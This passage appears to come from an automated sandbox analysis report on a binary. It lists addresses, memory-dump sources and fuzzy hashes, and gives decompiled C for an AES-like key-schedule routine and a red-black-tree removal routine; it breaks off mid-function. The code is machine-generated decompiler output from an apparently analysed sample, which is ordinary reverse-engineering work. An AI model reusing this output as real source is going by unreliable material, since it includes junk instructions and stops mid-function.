0x00000000
0x014428e6
0x014428ec
0x014428ef
0x014428f5
0x014428f8
0x014428f8
0x00000000
0x014428f8
0x00000000
0x00000000
0x01442866
0x01442866
0x01442876
0x01442879
0x00000000
0x00000000
0x014427e0
0x014427e7
0x014427e9
0x014427eb
0x01485afd
0x00000000
0x01485afd
0x00000000
0x00000000
0x01442633
0x01442638
0x0144263b
0x0144263c
0x0144263e
0x01442640
0x01442642
0x01442647
0x01442649
0x0144264e
0x01442650
0x01442653
0x01442659
0x014426a2
0x014426a7
0x014426ac
0x014426b2
0x01485b11
0x01485b15
0x01485b17
0x00000000
0x014426b8
0x014426b8
0x014426ba
0x014427a6
0x014427a6
0x014427a9
0x014427ab
0x014427b9
0x014427b9
0x014427be
0x014427c1
0x014427c3
0x014427c5
0x014427c7
0x01485c74
0x01485c79
0x01485c79
0x014427c7
0x00000000
0x014426c0
0x014426c0
0x014426c3
0x014426c6
0x014426c6
0x014426c9
0x014426c9
0x00000000
0x014426c9
0x014426ba
0x0144265b
0x0144265b
0x0144265e
0x01442667
0x0144266d
0x01442677
0x0144267c
0x0144267f
0x01442681
0x01485b49
0x01485b4e
0x014427cd
0x014427d0
0x014427d1
0x014427d2
0x014427d4
0x014427dd
0x01442687
0x01442687
0x0144268a
0x0144268b
0x0144268e
0x0144268f
0x01442691
0x01442696
0x01442698
0x0144269d
0x0144269f
0x00000000
0x0144269f
0x01442681
0x00000000
0x00000000
0x01442846
0x00000000
0x00000000
0x01442605
0x0144260a
0x0144260c
0x01442611
0x01442616
0x01442619
0x01442619
0x0144261e
0x00000000
0x01442624
0x01442627
0x01442627
0x00000000
0x00000000
0x01485b1f
0x00000000
0x00000000
0x01442894
0x0144289b
0x0144289d
0x014428a1
0x01485b2b
0x01485b2e
0x01485b2e
0x014428a7
0x014428a9
0x01485b04
0x01485b09
0x01485b09
0x01485b09
0x00000000
0x00000000
0x01485b35
0x01485b3c
0x014428fb
0x014428fb
0x014426cc
0x014426cc
0x014426d0
0x00000000
0x014426d2
0x014426d2
0x00000000
0x014426d2
0x00000000
0x00000000
0x014425fe
0x0144292d
0x0144292f
0x01442930
0x01442935
0x01442937
0x01442938
0x0144293b
0x0144293c
0x0144293e
0x01442940
0x01442944
0x01442948
0x0144294e
0x0144294f
0x01442950
0x01442957
0x01442958
0x0144295a
0x0144295e
0x01442962
0x01442964
0x01442966
0x0144296a
0x0144296e
0x01442972
0x01442974
0x0144297c
0x0144297e
0x0144297f
0x01442980
0x01442981
0x01442982
0x01442983
0x01442984
0x01442985
0x01442986
0x01442987
0x01442988
0x01442989
0x0144298a
0x0144298b
0x0144298c
0x0144298d
0x0144298e
0x0144298f
0x01442990
0x01442992
0x01442997
0x014429a3
0x014429a6
0x014429ab
0x014429ad
0x014429b0
0x014429b2
0x01485c80
0x014429b8
0x014429b8
0x014429bb
0x014429c0
0x014429c5
0x014429c6
0x014429c6
0x014429c9
0x014429cb
0x00000000
0x00000000
0x014429cd
0x014429d0
0x014429d9
0x014429db
0x014429dd
0x01442a7f
0x01442a84
0x01442a87
0x01442a89
0x01485ca1
0x01485ca3
0x00000000
0x01442a8f
0x01442a8f
0x00000000
0x01442a8f
0x00000000
0x014429e3
0x014429e3
0x014429e3
0x00000000
0x014429e3
0x014429dd
0x00000000
0x014429db
0x014429e6
0x014429e9
0x014429eb
0x014429ed
0x014429f3
0x014429f5
0x014429f8
0x014429fa
0x01442a97
0x01442a9a
0x01442a9d
0x01442add
0x00000000
0x01442a9f
0x01442aa2
0x01442aa5
0x01442aa8
0x01442aab
0x01485cab
0x01485caf
0x01485cc5
0x01485cda
0x01485cdc
0x01485cdf
0x01485ce5
0x00000000
0x01485ceb
0x01485ced
0x01485cee
0x00000000
0x01485cee
0x01485cb1
0x01485cb4
0x01485cb9
0x01485cbb
0x00000000
0x01485cbd
0x01485cbd
0x00000000
0x01485cbd
0x01485cbb
0x01442ab1
0x01442ab1
0x01442ac4
0x01442ac6
0x01442ac6
0x00000000
0x01442ac6
0x01442aab
0x00000000
0x01442a00
0x01442a09
0x01442a0e
0x01442a21
0x01442a24
0x01442a35
0x01442a3a
0x01442a3d
0x01442a42
0x01442a59
0x01442a59
0x01442a5c
0x01442a5f
0x01442a5f
0x014429fa
0x014429f3
0x01442a64
0x01442a64
0x01442a6b
0x01442a6b
0x01442a6d
0x01442a72
0x01442a72
0x00000000

Strings

PATH, xrefs: 01442642, 01442691

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 5ceabc746b9071f4a9ca06a3305ed0d1533282a7c161270d96ccf8a2355477a5
Instruction ID: 86d2177a97157f541e981b081f89cd6aad26072f295d1c0a004f7854f46680a9
Opcode Fuzzy Hash: 5ceabc746b9071f4a9ca06a3305ed0d1533282a7c161270d96ccf8a2355477a5
Instruction Fuzzy Hash: F2C1A275D00219DBEB25DF99E880EAEBBB1FF58740F05402EF905AB360D774A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00402D87, Relevance: 1.4, Strings: 1, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E00402D87(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t71;
				signed int* _t84;
				signed int _t97;
				signed int _t99;
				signed int _t109;
				signed int _t111;
				signed int* _t114;
				signed int _t131;
				signed int _t133;
				signed int _t137;
				signed int _t158;
				intOrPtr _t180;

				asm("aas");
				asm("sbb al, 0x85");
				asm("std");
				asm("outsb");
				_t84 = _a12;
				_t114 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t114 =  *_t84 & 0xff00ff00 |  *_t84 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[1] = _t84[1] & 0xff00ff00 | _t84[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[2] = _t84[2] & 0xff00ff00 | _t84[2] & 0x00ff00ff;
				_t66 =  &(_t114[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[3] = _t84[3] & 0xff00ff00 | _t84[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[4] = _t84[4] & 0xff00ff00 | _t84[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[5] = _t84[5] & 0xff00ff00 | _t84[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[6] = _t84[6] & 0xff00ff00 | _t84[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t114[7] = _t84[7] & 0xff00ff00 | _t84[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t66 | 0xffffffff;
				} else {
					_t180 = _a4;
					_t71 = 0;
					_a12 = 0;
					while(1) {
						_t158 =  *(_t66 + 0x18);
						_t97 = ( *(_t180 + 4 + (_t158 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t180 +  &(_t71[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t180 + 4 + (_t158 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 5 + (_t158 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t180 + 4 + (_t158 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t131 =  *_t66 ^ _t97;
						 *(_t66 + 0x1c) = _t97;
						_t99 =  *(_t66 + 4) ^ _t131;
						 *(_t66 + 0x20) = _t131;
						_t133 =  *(_t66 + 8) ^ _t99;
						 *(_t66 + 0x24) = _t99;
						 *(_t66 + 0x28) = _t133;
						if(_t71 == 6) {
							break;
						}
						_t109 = ( *(_t180 + 4 + (_t133 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t180 + 4 + (_t133 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 4 + (_t133 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t180 + 5 + (_t133 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t137 =  *(_t66 + 0x10) ^ _t109;
						 *(_t66 + 0x2c) = _t109;
						_t111 =  *(_t66 + 0x14) ^ _t137;
						 *(_t66 + 0x34) = _t111;
						_t71 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t137;
						 *(_t66 + 0x38) = _t111 ^ _t158;
						_t66 = _t66 + 0x20;
						_a12 = _t71;
						if(_t71 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

0x00402d87
0x00402d88
0x00402d8a
0x00402d8b
0x00402d93
0x00402d98
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9d
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Strings

h[~U, xrefs: 00402D8C

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: h[~U
API String ID: 0-360853666
Opcode ID: 9538f3809c8456439855593b402f6d3ef70dc041df88bdb2904f7bccdad53350
Instruction ID: 143e113e1b2bdae85ad0fb5d72a38cbfc0d26ec1c1dbcbfbf9fe48192191f66b
Opcode Fuzzy Hash: 9538f3809c8456439855593b402f6d3ef70dc041df88bdb2904f7bccdad53350
Instruction Fuzzy Hash: E251A3B3E14A214BD3188E09CD40631B792FFC8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 0141F900, Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0141F900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
